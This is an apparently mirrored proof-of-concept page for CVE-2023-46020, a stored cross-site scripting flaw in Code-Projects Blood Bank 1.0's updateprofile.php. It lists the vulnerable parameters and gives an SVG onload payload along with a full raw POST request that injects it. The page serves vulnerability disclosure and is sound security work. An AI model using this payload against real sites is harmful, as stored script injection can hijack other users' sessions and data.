Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-46020 PoC — Code-Projects Blood Bank 安全漏洞

Source
https://github.com/ersinerenler/CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability
Associated Vulnerability
Title:Code-Projects Blood Bank 安全漏洞 (CVE-2023-46020)
Description:Code-Projects Blood Bank是Code-Projects项目的一个血库系统。 Code-Projects Blood Bank 1.0版本存在安全漏洞,该漏洞源于文件updateprofile.php的rename等参数存在存储型跨站脚本(XSS)漏洞。
Readme
# CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability
+ Exploit Author: ersinerenler
# Vendor Homepage
+ https://code-projects.org/blood-bank-in-php-with-source-code
# Software Link
+ https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip
# Overview
+ Code-Projects Blood Bank V1.0 is susceptible to a critical security vulnerability involving Stored Cross-Site Scripting (XSS) through multiple parameters (rename, remail, rphone, and rcity) in the /updateprofile.php file. The application fails to adequately sanitize user-supplied data, allowing attackers to inject malicious scripts into the application. This could lead to the execution of arbitrary script code in the browsers of unsuspecting users, potentially compromising their security and privacy within the context of the affected site.
# Vulnerability Details
+ CVE ID: CVE-2023-46020
+ Affected Version: Blood Bank V1.0
+ Vulnerable File: updateprofile.php
+ Parameters: rename, remail, rphone, rcity
+ Attack Type: local
# References:
+ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46020
+ https://nvd.nist.gov/vuln/detail/CVE-2023-46020
# Description
+ The parameters rename, remail, rphone, and rcity in the /file/updateprofile.php file of Code-Projects Blood Bank V1.0 are susceptible to Stored Cross-Site Scripting (XSS). This vulnerability arises due to insufficient input validation and sanitation of user-supplied data. An attacker can exploit this weakness by injecting malicious scripts into these parameters, which, when stored on the server, may be executed when other users view the affected user's profile.
# Proof of Concept (PoC) : 
+ Intercept the POST request to updateprofile.php via Burp Suite
+ Inject the payload to the vulnerable parameters
+ Payload: `"><svg/onload=alert(document.domain)>`
+ Example request for `rname` parameter
```
POST /bloodbank/file/updateprofile.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
Origin: http://localhost
Connection: close
Referer: http://localhost/bloodbank/rprofile.php?id=1
Cookie: PHPSESSID=<some-cookie-value>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

rname=test"><svg/onload=alert(document.domain)>&remail=test%40gmail.com&rpassword=test&rphone=8875643456&rcity=lucknow&bg=A%2B&update=Update
```
+ Go to the profile page and trigger the XSS
<img width="1447" alt="image" src="https://github.com/ersinerenler/CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability/assets/113091631/d579130a-0668-4cce-b76b-b7919e019c9d">
File Snapshot

 [4.0K]  /data/pocs/f5a7cbab24e95ad4a8b54d17039c279903db9f26
└── [2.9K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.